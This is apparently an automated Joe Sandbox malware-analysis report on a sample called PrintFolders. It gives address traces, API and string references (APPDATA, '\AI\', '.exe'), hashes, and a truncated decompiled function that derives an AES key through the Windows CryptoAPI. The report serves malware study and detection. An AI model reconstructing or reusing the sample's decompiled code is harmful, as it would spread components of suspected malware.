0x0040818c
0x004081b2
0x004081c6
0x0040818e
0x00408191
0x00408194
0x00408196
0x00408199
0x0040819b
0x0040819b
0x0040819d
0x004081a4
0x004081a4
0x004081c8
0x004081ce
0x004081d5
0x004081dc
0x004081df
0x004081e2
0x004081e7
0x004081ec
0x004081f3
0x004081fa
0x004081fd
0x00408203
0x00408206
0x00408237
0x00408237
0x0040823d
0x00408247
0x00408251
0x00408258
0x0040825b
0x0040828c
0x0040828c
0x00408292
0x0040829c
0x004082a6
0x004082ad
0x004082b0
0x004082e1
0x004082e1
0x004082e7
0x004082f1
0x004082fb
0x00408302
0x00408305
0x00408336
0x00408336
0x00408340
0x0040834a
0x00000000
0x00408307
0x00408307
0x0040830d
0x0040830e
0x00408310
0x00408316
0x0040832c
0x0040832c
0x0040832e
0x00408333
0x00000000
0x00408318
0x00408318
0x0040831b
0x00408323
0x00408326
0x00000000
0x00000000
0x00000000
0x00000000
0x00408326
0x00408316
0x004082b2
0x004082b2
0x004082b8
0x004082b9
0x004082bb
0x004082c1
0x004082d7
0x004082d7
0x004082d9
0x004082de
0x00000000
0x004082c3
0x004082c3
0x004082c6
0x004082ce
0x004082d1
0x00000000
0x00000000
0x00000000
0x00000000
0x004082d1
0x004082c1
0x0040825d
0x0040825d
0x00408263
0x00408264
0x00408266
0x0040826c
0x00408282
0x00408282
0x00408284
0x00408289
0x00000000
0x0040826e
0x0040826e
0x00408271
0x00408279
0x0040827c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040827c
0x0040826c
0x00408208
0x00408208
0x0040820e
0x0040820f
0x00408211
0x00408217
0x0040822d
0x0040822d
0x0040822f
0x00408234
0x00000000
0x00408219
0x00408219
0x0040821c
0x00408224
0x00408227
0x00000000
0x00000000
0x00000000
0x00000000
0x00408227
0x00408217
0x00408206
0x004080da
0x004080da
0x004080e0
0x004080e1
0x004080e3
0x004080e9
0x004080ff
0x004080ff
0x00408101
0x00408106
0x00000000
0x004080eb
0x004080eb
0x004080ee
0x004080f6
0x004080f9
0x00000000
0x00000000
0x00000000
0x00000000
0x004080f9
0x004080e9
0x00408081
0x00408081
0x00408087
0x00408088
0x0040808a
0x00408090
0x004080a6
0x004080a6
0x004080a8
0x004080ad
0x00000000
0x00408092
0x00408092
0x00408095
0x0040809d
0x004080a0
0x00000000
0x00000000
0x00000000
0x00000000
0x004080a0
0x00408090
0x00408028
0x00408028
0x0040802e
0x0040802f
0x00408031
0x00408037
0x0040804d
0x0040804d
0x0040804f
0x00408054
0x00000000
0x00408039
0x00408039
0x0040803c
0x00408044
0x00408047
0x00000000
0x00000000
0x00000000
0x00000000
0x00408047
0x00408037
0x00406b28
0x00406b28
0x00406b37
0x00406b3d
0x00406b3f
0x00406b6d
0x00406b6f
0x00406b72
0x00406b74
0x00406b74
0x00406b77
0x00406b77
0x00406b79
0x00406b7a
0x00406b7a
0x00406b7e
0x00406b7e
0x00406b80
0x00406b81
0x00406b41
0x00406b41
0x00406b47
0x00406b4a
0x00406b4a
0x00406b50
0x00406b50
0x00406b52
0x00406b53
0x00406b55
0x00000000
0x00406b57
0x00406b5f
0x00406b60
0x00406b60
0x00406b55
0x00406b88
0x00406b93
0x00406b98
0x00406b9c
0x00406ba1
0x00406ba9
0x00406bb2
0x00406bb7
0x00406bbe
0x00406bc8
0x00406bd6
0x00406be3
0x00406be8
0x00406bf2
0x00406bf7
0x00406bfd
0x00406c00
0x00406c31
0x00406c31
0x00406c35
0x00406c3b
0x00406c45
0x00406c4f
0x00406c56
0x00406c59
0x00406c8a
0x00406c8a
0x00406c95
0x00406c9c
0x00406ca1
0x00406ca4
0x00406cae
0x00406cb1
0x00406cb6
0x00406cba
0x00406cbf
0x00406cc2
0x00406cc4
0x00406f15
0x00406f1c
0x00406f1e
0x00406f23
0x00406f29
0x00406f30
0x00406f35
0x00406f38
0x00406f3f
0x00406f41
0x00406f53
0x00406f5a
0x00406f5f
0x00406f6c
0x00406f71
0x00406f71
0x00406f3f
0x00406f74
0x00406f79
0x00406f7b
0x00406f7d
0x00406f86
0x00406f8d
0x00406f91
0x00406f96
0x00406f96
0x00406f9d
0x00406fa2
0x00406fac
0x00406fb6
0x00406fc0
0x00406fc7
0x00406fc7
0x00406fca
0x00406fd0
0x00406fd0
0x00406fd2
0x00406fd3
0x00406fd3
0x00406fe5
0x00406fea
0x00406fee
0x00406ff6
0x00406ffe
0x00407001
0x00407031
0x00407046
0x00407003
0x00407003
0x00407006
0x00407009
0x00407015
0x0040701c
0x00407022
0x00407022
0x0040704b
0x00407055
0x0040705f
0x00407069
0x0040706c
0x00407073
0x00407078
0x00407080
0x00407087
0x0040708e
0x00407097
0x004070a8
0x004070ad
0x004070b7
0x004070bc
0x004070c2
0x004070c5
0x004070f6
0x004070f6
0x004070fa
0x00407100
0x0040710a
0x00407114
0x0040711b
0x0040711e
0x0040714f
0x0040714f
0x00407153
0x00407159
0x00407163
0x0040716d
0x00407174
0x00407177
0x004071a8
0x004071a8
0x004071b3
0x004071ba
0x004071bf
0x004071c2
0x004071cc
0x004071cf
0x004071d4
0x004071d8
0x004071dd
0x004071e0
0x004071e2
0x004073d8
0x004073dd
0x004073e7
0x004073f1
0x004073fb
0x00407404
0x0040740b
0x00407411
0x00407418
0x0040741d
0x00407420
0x00407427
0x0040742f
0x00407437
0x00407443
0x00407454
0x0040745c
0x00407461
0x0040746e
0x00407473
0x00407473
0x00407427
0x00407476
0x0040747d
0x0040747f
0x0040747f
0x00407481
0x00407481
0x00407488
0x00407489
0x00407489
0x00407481
0x0040748e
0x00407493
0x0040749d
0x004074a7
0x004074b1
0x004074b8
0x004074b8
0x004074c0
0x004074c0
0x004074c2
0x004074c3
0x004074c3
0x004074d5
0x004074da
0x004074de
0x004074e6
0x004074ee
0x004074f1
0x00407521
0x00407536
0x004074f3
0x004074f3
0x004074f6
0x004074f9
0x00407505
0x0040750c
0x00407512
0x00407512
0x0040753b
0x00407545
0x0040754f
0x00407559
0x0040755c
0x00407563
0x00407568
0x00407570
0x00407577
0x0040757e
0x00407587
0x00407598
0x0040759d
0x004075a7
0x004075ac
0x004075b2
0x004075b5
0x004075e6
0x004075e6
0x004075ea
0x004075f0
0x004075fa
0x00407604
0x0040760b
0x0040760e
0x0040763f
0x0040763f
0x00407643
0x00407649
0x00407653
0x0040765d
0x00407664
0x00407667
0x00407698
0x00407698
0x004076a3
0x004076aa
0x004076af
0x004076b2
0x004076bc
0x004076bf
0x004076c4
0x004076c8
0x004076cd
0x004076d0
0x004076d2
0x004078c8
0x004078cd
0x004078d7
0x004078e1
0x004078e7
0x004078ee
0x004078f3
0x004078f6
0x004078fd
0x00407910
0x00407915
0x0040791b
0x00407928
0x0040792d
0x0040792d
0x004078fd
0x00407930
0x00407935
0x00407937
0x00407939
0x00407940
0x00407947
0x0040794e
0x00407955
0x0040795c
0x00407963
0x0040796a
0x0040796a
0x0040796c
0x0040796c
0x00407971
0x00407976
0x00407980
0x0040798a
0x00407994
0x0040799b
0x0040799b
0x004079a0
0x004079a0
0x004079a2
0x004079a3
0x004079a3
0x004079b5
0x004079ba
0x004079be
0x004079c6
0x004079ce
0x004079d1
0x00407a01
0x00407a16
0x004079d3
0x004079d3
0x004079d6
0x004079d9
0x004079e5
0x004079ec
0x004079f2
0x004079f2
0x00407a1b
0x00407a25
0x00407a2f
0x00407a39
0x00407a3c
0x00407a43
0x00407a48
0x00407a50
0x00407a57
0x00407a5e
0x00407a67
0x00407a78
0x00407a7d
0x00407a87
0x00407a8c
0x00407a92
0x00407a95
0x00407ac6
0x00407ac6
0x00407aca
0x00407ad0
0x00407ada
0x00407ae4
0x00407aeb
0x00407aee
0x00407b1f
0x00407b1f
0x00407b23
0x00407b29
0x00407b33
0x00407b3d
0x00407b44
0x00407b47
0x00407b78
0x00407b78
0x00407b83
0x00407b8a
0x00407b8f
0x00407b92
0x00407b9c
0x00407b9f
0x00407ba4
0x00407ba8
0x00407bad
0x00407bb0
0x00407bb2
0x00407da8
0x00407dac
0x00407db2
0x00407db5
0x00407de6
0x00407de6
0x00407dea
0x00407df0
0x00407dfa
0x00407e04
0x00407e0b
0x00407e0e
0x00408cae
0x00408cb5
0x00408cba
0x00408cc0
0x00000000
0x00407e14
0x00407e14
0x00407e1a
0x00407e1b
0x00407e1d
0x00407e23
0x00407e39
0x00407e39
0x00407e3b
0x00000000
0x00407e25
0x00407e25
0x00407e28
0x00407e30
0x00407e33
0x00000000
0x00000000
0x00000000
0x00000000
0x00407e33
0x00407e23
0x00407db7
0x00407db7
0x00407dbd
0x00407dbe
0x00407dc0
0x00407dc6
0x00407ddc
0x00407ddc
0x00407dde
0x00407de3
0x00000000
0x00407dc8
0x00407dc8
0x00407dcb
0x00407dd3
0x00407dd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00407dd6
0x00407dc6
0x00407bb8
0x00407bb8
0x00407bc5
0x00407bd3
0x00407be0
0x00407be5
0x00407be8
0x00407bea
0x00407bee
0x00407bf3
0x00407bf8
0x00407bfb
0x00407c21
0x00407c35
0x00407bfd
0x00407c00
0x00407c03
0x00407c05
0x00407c08
0x00407c0a
0x00407c0a
0x00407c0c
0x00407c13
0x00407c13
0x00407c37
0x00407c3d
0x00407c44
0x00407c4b
0x00407c4e
0x00407c51
0x00407c56
0x00407c5b
0x00407c62
0x00407c69
0x00407c6c
0x00407c72
0x00407c75
0x00407ca6
0x00407ca6
0x00407cac
0x00407cb6
0x00407cc0
0x00407cc7
0x00407cca
0x00407cfb
0x00407cfb
0x00407d01
0x00407d0b
0x00407d15
0x00407d1c
0x00407d1f
0x00407d50
0x00407d50
0x00407d56
0x00407d60
0x00407d6a
0x00407d71
0x00407d74
0x00000000
0x00407d7a
0x00407d7a
0x00407d80
0x00407d81
0x00407d83
0x00407d89
0x00000000
0x00407d8f
0x00407d8f
0x00407d92
0x00407d9a
0x00407d9d
0x00000000
0x00407da3
0x00000000
0x00407da3
0x00407d9d
0x00407d89
0x00407d21
0x00407d21
0x00407d27
0x00407d28
0x00407d2a
0x00407d30
0x00407d46
0x00407d46
0x00407d48
0x00407d4d
0x00000000
0x00407d32
0x00407d32
0x00407d35
0x00407d3d
0x00407d40
0x00000000
0x00000000
0x00000000
0x00000000
0x00407d40
0x00407d30
0x00407ccc
0x00407ccc
0x00407cd2
0x00407cd3
0x00407cd5
0x00407cdb
0x00407cf1
0x00407cf1
0x00407cf3
0x00407cf8
0x00000000
0x00407cdd
0x00407cdd
0x00407ce0
0x00407ce8
0x00407ceb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ceb
0x00407cdb
0x00407c77
0x00407c77
0x00407c7d
0x00407c7e
0x00407c80
0x00407c86
0x00407c9c
0x00407c9c
0x00407c9e
0x00407ca3
0x00000000
0x00407c88
0x00407c88
0x00407c8b
0x00407c93
0x00407c96
0x00000000
0x00000000
0x00000000
0x00000000
0x00407c96
0x00407c86
0x00407c75
0x00407b49
0x00407b49
0x00407b4f
0x00407b50
0x00407b52
0x00407b58
0x00407b6e
0x00407b6e
0x00407b70
0x00407b75
0x00000000
0x00407b5a
0x00407b5a
0x00407b5d
0x00407b65
0x00407b68
0x00000000
0x00000000
0x00000000
0x00000000
0x00407b68
0x00407b58
0x00407af0
0x00407af0
0x00407af6
0x00407af7
0x00407af9
0x00407aff
0x00407b15
0x00407b15
0x00407b17
0x00407b1c
0x00000000
0x00407b01
0x00407b01
0x00407b04
0x00407b0c
0x00407b0f
0x00000000
0x00000000
0x00000000
0x00000000
0x00407b0f
0x00407aff
0x00407a97
0x00407a97
0x00407a9d
0x00407a9e
0x00407aa0
0x00407aa6
0x00407abc
0x00407abc
0x00407abe
0x00407ac3
0x00000000
0x00407aa8
0x00407aa8
0x00407aab
0x00407ab3
0x00407ab6
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ab6
0x00407aa6
0x004076d8
0x004076d8
0x004076e5
0x004076f3
0x00407700
0x00407705
0x00407708
0x0040770a
0x0040770e
0x00407713
0x00407718
0x0040771b
0x00407741
0x00407755
0x0040771d
0x00407720
0x00407723
0x00407725
0x00407728
0x0040772a
0x0040772a
0x0040772c
0x00407733
0x00407733
0x00407757
0x0040775d
0x00407764
0x0040776b
0x0040776e
0x00407771
0x00407776
0x0040777b
0x00407782
0x00407789
0x0040778c
0x00407792
0x00407795
0x004077c6
0x004077c6
0x004077cc
0x004077d6
0x004077e0
0x004077e7
0x004077ea
0x0040781b
0x0040781b
0x00407821
0x0040782b
0x00407835
0x0040783c
0x0040783f
0x00407870
0x00407870
0x00407876
0x00407880
0x0040788a
0x00407891
0x00407894
0x00000000
0x0040789a
0x0040789a
0x004078a0
0x004078a1
0x004078a3
0x004078a9
0x00000000
0x004078af
0x004078af
0x004078b2
0x004078ba
0x004078bd
0x00000000
0x004078c3
0x00000000
0x004078c3
0x004078bd
0x004078a9
0x00407841
0x00407841
0x00407847
0x00407848
0x0040784a
0x00407850
0x00407866
0x00407866
0x00407868
0x0040786d
0x00000000
0x00407852
0x00407852
0x00407855
0x0040785d
0x00407860
0x00000000
0x00000000
0x00000000
0x00000000
0x00407860
0x00407850
0x004077ec
0x004077ec
0x004077f2
0x004077f3
0x004077f5
0x004077fb
0x00407811
0x00407811
0x00407813
0x00407818
0x00000000
0x004077fd
0x004077fd
0x00407800
0x00407808
0x0040780b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040780b
0x004077fb
0x00407797
0x00407797
0x0040779d
0x0040779e
0x004077a0
0x004077a6
0x004077bc
0x004077bc
0x004077be
0x004077c3
0x00000000
0x004077a8
0x004077a8
0x004077ab
0x004077b3
0x004077b6
0x00000000
0x00000000
0x00000000
0x00000000
0x004077b6
0x004077a6
0x00407795
0x00407669
0x00407669
0x0040766f
0x00407670
0x00407672
0x00407678
0x0040768e
0x0040768e
0x00407690
0x00407695
0x00000000
0x0040767a
0x0040767a
0x0040767d
0x00407685
0x00407688
0x00000000
0x00000000
0x00000000
0x00000000
0x00407688
0x00407678
0x00407610
0x00407610
0x00407616
0x00407617
0x00407619
0x0040761f
0x00407635
0x00407635
0x00407637
0x0040763c
0x00000000
0x00407621
0x00407621
0x00407624
0x0040762c
0x0040762f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040762f
0x0040761f
0x004075b7
0x004075b7
0x004075bd
0x004075be
0x004075c0
0x004075c6
0x004075dc
0x004075dc
0x004075de
0x004075e3
0x00000000
0x004075c8
0x004075c8
0x004075cb
0x004075d3
0x004075d6
0x00000000
0x00000000
0x00000000
0x00000000
0x004075d6
0x004075c6
0x004071e8
0x004071e8
0x004071f5
0x00407203
0x00407210
0x00407215
0x00407218
0x0040721a
0x0040721e
0x00407223
0x00407228
0x0040722b
0x00407251
0x00407265
0x0040722d
0x00407230
0x00407233
0x00407235
0x00407238
0x0040723a
0x0040723a
0x0040723c
0x00407243
0x00407243
0x00407267
0x0040726d
0x00407274
0x0040727b
0x0040727e
0x00407281
0x00407286
0x0040728b
0x00407292
0x00407299
0x0040729c
0x004072a2
0x004072a5
0x004072d6
0x004072d6
0x004072dc
0x004072e6
0x004072f0
0x004072f7
0x004072fa
0x0040732b
0x0040732b
0x00407331
0x0040733b
0x00407345
0x0040734c
0x0040734f
0x00407380
0x00407380
0x00407386
0x00407390
0x0040739a
0x004073a1
0x004073a4
0x00000000
0x004073aa
0x004073aa
0x004073b0
0x004073b1
0x004073b3
0x004073b9
0x00000000
0x004073bf
0x004073bf
0x004073c2
0x004073ca
0x004073cd
0x00000000
0x004073d3
0x00000000
0x004073d3
0x004073cd
0x004073b9
0x00407351
0x00407351
0x00407357
0x00407358
0x0040735a
0x00407360
0x00407376
0x00407376
0x00407378
0x0040737d
0x00000000
0x00407362
0x00407362
0x00407365
0x0040736d
0x00407370
0x00000000
0x00000000
0x00000000
0x00000000
0x00407370
0x00407360
0x004072fc
0x004072fc
0x00407302
0x00407303
0x00407305
0x0040730b
0x00407321
0x00407321
0x00407323
0x00407328
0x00000000
0x0040730d
0x0040730d
0x00407310
0x00407318
0x0040731b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040731b
0x0040730b
0x004072a7
0x004072a7
0x004072ad
0x004072ae
0x004072b0
0x004072b6
0x004072cc
0x004072cc
0x004072ce
0x004072d3
0x00000000
0x004072b8
0x004072b8
0x004072bb
0x004072c3
0x004072c6
0x00000000
0x00000000
0x00000000
0x00000000
0x004072c6
0x004072b6
0x004072a5
0x00407179
0x00407179
0x0040717f
0x00407180
0x00407182
0x00407188
0x0040719e
0x0040719e
0x004071a0
0x004071a5
0x00000000
0x0040718a
0x0040718a
0x0040718d
0x00407195
0x00407198
0x00000000
0x00000000
0x00000000
0x00000000
0x00407198
0x00407188
0x00407120
0x00407120
0x00407126
0x00407127
0x00407129
0x0040712f
0x00407145
0x00407145
0x00407147
0x0040714c
0x00000000
0x00407131
0x00407131
0x00407134
0x0040713c
0x0040713f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040713f
0x0040712f
0x004070c7
0x004070c7
0x004070cd
0x004070ce
0x004070d0
0x004070d6
0x004070ec
0x004070ec
0x004070ee
0x004070f3
0x00000000
0x004070d8
0x004070d8
0x004070db
0x004070e3
0x004070e6
0x00000000
0x00000000
0x00000000
0x00000000
0x004070e6
0x004070d6
0x00406cca
0x00406cca
0x00406cd7
0x00406ce5
0x00406cf2
0x00406cf7
0x00406cfa
0x00406cfc
0x00406d00
0x00406d05
0x00406d0a
0x00406d0d
0x00406d33
0x00406d47
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d1a
0x00406d1c
0x00406d1c
0x00406d1e
0x00406d25
0x00406d25
0x00406d49
0x00406d4f
0x00406d56
0x00406d5d
0x00406d60
0x00406d63
0x00406d68
0x00406d6d
0x00406d74
0x00406d7b
0x00406d7e
0x00406d84
0x00406d87
0x00406db8
0x00406db8
0x00406dbe
0x00406dc8
0x00406dd2
0x00406dd9
0x00406ddc
0x00406e0d
0x00406e0d
0x00406e13
0x00406e1d
0x00406e27
0x00406e2e
0x00406e31
0x00406e62
0x00406e62
0x00406e68
0x00406e72
0x00406e7c
0x00406e83
0x00406e86
0x00406eb7
0x00406eb7
0x00406ec1
0x00406ecb
0x00406ed2
0x00406ed2
0x00406ed8
0x00406edb
0x00408cc5
0x00408cca
0x00408cd2
0x00408cd3
0x00408cd7
0x00408ce4
0x00406ee1
0x00406ee1
0x00406ee7
0x00406ee8
0x00406eea
0x00406ef0
0x00408869
0x00408869
0x0040886b
0x00000000
0x00406ef6
0x00406ef6
0x00406ef9
0x00406f01
0x00406f04
0x00000000
0x00406f0a
0x00000000
0x00406f0a
0x00406f04
0x00406ef0
0x00406e88
0x00406e88
0x00406e8e
0x00406e8f
0x00406e91
0x00406e97
0x00406ead
0x00406ead
0x00406eaf
0x00406eb4
0x00000000
0x00406e99
0x00406e99
0x00406e9c
0x00406ea4
0x00406ea7
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ea7
0x00406e97
0x00406e33
0x00406e33
0x00406e39
0x00406e3a
0x00406e3c
0x00406e42
0x00406e58
0x00406e58
0x00406e5a
0x00406e5f
0x00000000
0x00406e44
0x00406e44
0x00406e47
0x00406e4f
0x00406e52
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e52
0x00406e42
0x00406dde
0x00406dde
0x00406de4
0x00406de5
0x00406de7
0x00406ded
0x00406e03
0x00406e03
0x00406e05
0x00406e0a
0x00000000
0x00406def
0x00406def
0x00406df2
0x00406dfa
0x00406dfd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406dfd
0x00406ded
0x00406d89
0x00406d89
0x00406d8f
0x00406d90
0x00406d92
0x00406d98
0x00406dae
0x00406dae
0x00406db0
0x00406db5
0x00000000
0x00406d9a
0x00406d9a
0x00406d9d
0x00406da5
0x00406da8
0x00000000
0x00000000
0x00000000
0x00000000
0x00406da8
0x00406d98
0x00406d87
0x00406c5b
0x00406c5b
0x00406c61
0x00406c62
0x00406c64
0x00406c6a
0x00406c80
0x00406c80
0x00406c82
0x00406c87
0x00000000
0x00406c6c
0x00406c6c
0x00406c6f
0x00406c77
0x00406c7a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c7a
0x00406c6a
0x00406c02
0x00406c02
0x00406c08
0x00406c09
0x00406c0b
0x00406c11
0x00406c27
0x00406c27
0x00406c29
0x00406c2e
0x00000000
0x00406c13
0x00406c13
0x00406c16
0x00406c1e
0x00406c21
0x00408ce5
0x00408ce5
0x00408cea
0x00408cea
0x00408cef
0x00408cef
0x00408cf4
0x00408cf5
0x00408cf6
0x00408cf7
0x00408cf8
0x00408cf9
0x00408cfa
0x00408cfb
0x00408cfc
0x00408cfd
0x00408cfe
0x00408cff
0x00408d00
0x00408d01
0x00408d03
0x00408d05
0x00408d10
0x00408d11
0x00408d17
0x00408d1c
0x00408d1e
0x00408d21
0x00408d22
0x00408d23
0x00408d24
0x00408d28
0x00408d2e
0x00408d35
0x00408d3a
0x00408d40
0x00408d42
0x00408d44
0x00408d50
0x00408d50
0x00408d55
0x00408d58
0x00408d5f
0x00408d66
0x00408d66
0x00408d50
0x00408d78
0x00408d7d
0x00408d94
0x00408d9b
0x00408db2
0x00408db9
0x00408dbd
0x00408dd0
0x00408ddb
0x00408de5
0x00408df0
0x00408dfd
0x00408e08
0x00408e12
0x00408e1d
0x00408e27
0x00408e36
0x00408e3d
0x00408e42
0x00408e4b
0x00408e56
0x00408e61
0x00408e6c
0x00408e77
0x00408e82
0x00408e8d
0x00408e91
0x00408e96
0x00408e96
0x00408e98
0x00408ea0
0x00408ea3
0x00408ea4
0x00408eaa
0x00408eb0
0x00408eb5
0x00408eb7
0x00000000
0x00000000
0x00408ec8
0x00408ecd
0x00408ed5
0x00408eda
0x00408edc
0x00408ede
0x00408ee6
0x00408eeb
0x00408eed
0x00408eef
0x00408ef2
0x00000000
0x00408ef2
0x00408eed
0x00408f2e
0x00408f36
0x00408f3b
0x00408f3e
0x00408f4d
0x00408f52
0x00408f56
0x00408f69
0x00408f6f
0x00408f74
0x00408f7e
0x00408f83
0x00408f88
0x00408f98
0x00408fa3
0x00408fa5
0x00408fb0
0x00408fb4
0x00408fb9
0x00408fbb
0x00000000
0x00000000
0x00408fcc
0x00408fd4
0x00408fd9
0x00408fdc
0x00000000
0x00000000
0x00408fde
0x00408fe1
0x00000000
0x00000000
0x00408fef
0x00408ff8
0x00408ff8
0x00408fff
0x00409004
0x00409010
0x00409011
0x0040902a
0x00409030
0x00409035
0x0040903f
0x00409044
0x00409049
0x00409059
0x00409066
0x00409071
0x00409075
0x0040907a
0x0040907c
0x00000000
0x00409082
0x0040908d
0x0040908f
0x00409092
0x00000000
0x00409098
0x004090a6
0x004090a7
0x004090af
0x004090b2
0x004090bc
0x004090d5
0x004090d6
0x004090db
0x004090de
0x004090ea
0x004090f7
0x004090fa
0x00409108
0x00409112
0x00409117
0x0040911a
0x00409120
0x00409127
0x0040913d
0x00409143
0x00409145
0x0040914c
0x0040914c
0x00409150
0x0040916c
0x0040916e
0x00409171
0x00409177
0x0040917c
0x0040917e
0x00409180
0x00409185
0x00409185
0x00409188
0x0040918b
0x0040918d
0x00409193
0x00409193
0x00409196
0x00409199
0x004091a4
0x004091a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040919b
0x0040919b
0x0040919e
0x004091a0
0x004091a0
0x004091a9
0x004091a9
0x004091ab
0x00000000
0x004091ad
0x004091ad
0x004091b0
0x004091d4
0x00000000
0x00000000
0x00000000
0x004091b0
0x004091ab
0x00000000
0x004091b2
0x004091b2
0x004091bd
0x004091c0
0x004091c1
0x004091c7
0x004091c9
0x004091c9
0x00000000
0x00000000
0x00000000
0x00409127
0x00409092
0x004091d6
0x004091d6
0x004091db
0x004091dc
0x004091dd
0x004091de
0x004091df
0x004091e0
0x004091e1
0x004091e6
0x004091ed
0x004091f6
0x004091fd
0x00409204
0x0040920b
0x0040920d
0x00409212
0x00409218
0x0040921e
0x00409225
0x0040922d
0x00409234
0x00409236
0x00409240
0x00409247
0x0040924c
0x0040925a
0x00409262
0x00409268
0x00409272
0x00409277
0x00409234
0x00409282
0x0040928c
0x00000000
0x00409129
0x00409129
0x0040912f
0x0040912f
0x00000000
0x00408fe3
0x00408fe8
0x00408fe8
0x00408ef7
0x00408ef7
0x00408efd
0x00408f1a
0x00408f24
0x00408eff
0x00408eff
0x00408f04
0x00408f14
0x00408f14
0x00408efd
0x00000000
0x00000000
0x00000000
0x00406c21
0x00406c11
0x00406c00
0x00000000
0x00000000
0x00000000
0x00406a30
0x00406a20
0x00406a12
0x00000000

APIs

CreateDirectoryA.KERNEL32(0040813E,00000000,7BD02EAD,?), ref: 0040684F
GetLastError.KERNEL32 ref: 00406859
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,7BD02EAD,?,00000000), ref: 00406B37
__Init_thread_footer.LIBCMT ref: 00406F6C
Sleep.KERNEL32(?,7BD02EAD), ref: 00408D5F

Part of subcall function 00402980: Concurrency::cancel_current_task.LIBCPMT ref: 00402AD3

__Init_thread_footer.LIBCMT ref: 0040746E
__Init_thread_footer.LIBCMT ref: 00407928

Strings

APPDATA, xrefs: 00406B63
)<, xrefs: 00408E12
.exe, xrefs: 004068BF, 00406D2E, 0040724C, 0040773C, 00407C1C
\AI\, xrefs: 004073E7
OCjO, xrefs: 004073F1
KC^., xrefs: 004078D7

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$Concurrency::cancel_current_taskCreateDirectoryErrorFolderLastPathSleep
String ID: .exe$APPDATA$KC^.$OCjO$\AI\$)<
API String ID: 1816155683-548552080
Opcode ID: 139fb17deca05b2c8f1ec0f17ad5d96a8aaffc1ce760a88e4899f3a611e21d42
Instruction ID: 0be4c55f84660d75167a20acadb567ab38b5d4c0f6123eba4fa82a51dea9132a
Opcode Fuzzy Hash: 139fb17deca05b2c8f1ec0f17ad5d96a8aaffc1ce760a88e4899f3a611e21d42
Instruction Fuzzy Hash: 02E21570A002549BEB19DB28CD447DDBB71AF46308F1082EED449BB3D2DB799AC4CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403770 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 232
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00403770(void* __ebx, int __ecx, int __edx, void* __edi, intOrPtr* _a4, void* _a8, intOrPtr _a24, intOrPtr _a28) {
				long* _v8;
				char _v16;
				signed int _v24;
				void _v136;
				long* _v140;
				int _v144;
				char _v148;
				long* _v152;
				int _v156;
				signed int _v160;
				int _v164;
				BYTE* _v168;
				int _v172;
				intOrPtr* _v176;
				int _v180;
				intOrPtr _v220;
				void* __esi;
				void* __ebp;
				signed int _t69;
				signed int _t70;
				void* _t77;
				intOrPtr* _t82;
				char* _t92;
				void* _t94;
				intOrPtr _t95;
				void* _t99;
				int _t100;
				void* _t101;
				BYTE* _t103;
				intOrPtr _t106;
				int _t117;
				void* _t118;
				intOrPtr* _t126;
				void* _t127;
				int _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t140;
				signed int _t145;
				void* _t146;
				intOrPtr* _t147;
				signed int _t149;
				void* _t150;
				void* _t151;
				void* _t152;
				intOrPtr* _t153;
				signed int _t155;
				void* _t157;
				void* _t159;

				_t69 =  *0x43d054; // 0x7bd02ead
				_t70 = _t69 ^ _t155;
				_v24 = _t70;
				 *[fs:0x0] =  &_v16;
				_t117 = __edx;
				_v172 = __edx;
				_v156 = __ecx;
				_v176 = _a4;
				_v8 = 0;
				_t151 = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
				_v160 = _a24 + _a24;
				_t77 = memcpy( &_v136, _t151, 0x1b << 2);
				_t159 = _t157 - 0xa8 + 0xc;
				__imp__CryptAcquireContextW(_t77, 0,  &_v136, 0x18, 0xf0000000, _t70, __edi, _t150, __ebx,  *[fs:0x0], 0x42c34d, 0xffffffff); // executed
				if(_t77 == 0) {
					L7:
					_t145 = GetLastError();
					CryptReleaseContext(_v140, 0);
				} else {
					_t92 =  &_v148;
					__imp__CryptCreateHash(_v140, 0x800c, 0, 0, _t92); // executed
					if(_t92 == 0) {
						goto L7;
					} else {
						_t94 =  >=  ? _a8 :  &_a8;
						_t147 = _t94;
						_v164 = _t94;
						_t127 = _t147 + 1;
						do {
							_t95 =  *_t147;
							_t147 = _t147 + 1;
							_t168 = _t95;
						} while (_t95 != 0);
						_t149 = _t147 - _t127 + 1;
						_t151 = E0040EE0D(_t149, _t151, _t168,  ~(0 | _t168 > 0x00000000) | _t149 * 0x00000002);
						_t99 = E0041657C(_t151, _v164, _t149);
						_t159 = _t159 + 0x10;
						__imp__CryptHashData(_v148, _t151, _v160, 0);
						if(_t99 != 0) {
							_t100 =  &_v152;
							__imp__CryptDeriveKey(_v140, 0x660e, _v148, 0, _t100); // executed
							__eflags = _t100;
							if(__eflags != 0) {
								_push(_t117); // executed
								_t101 = E004162EE(); // executed
								_t151 = _t101;
								E004104C0(_t151, _v156, _t117);
								_t103 = E0040EE0D(_t149, _t151, __eflags, 0xa0);
								_t138 = _v172;
								_t145 = 0;
								_t159 = _t159 + 0x14;
								_v168 = _t103;
								_v144 = 0;
								_v156 = 0;
								_v160 = 0;
								__eflags = _t138;
								if(__eflags != 0) {
									_t132 = _t138;
									_t106 = 0xa0 - _t151;
									__eflags = 0xa0;
									_v164 = _t132;
									_v180 = 0xa0;
									while(1) {
										_t117 = 0xa0;
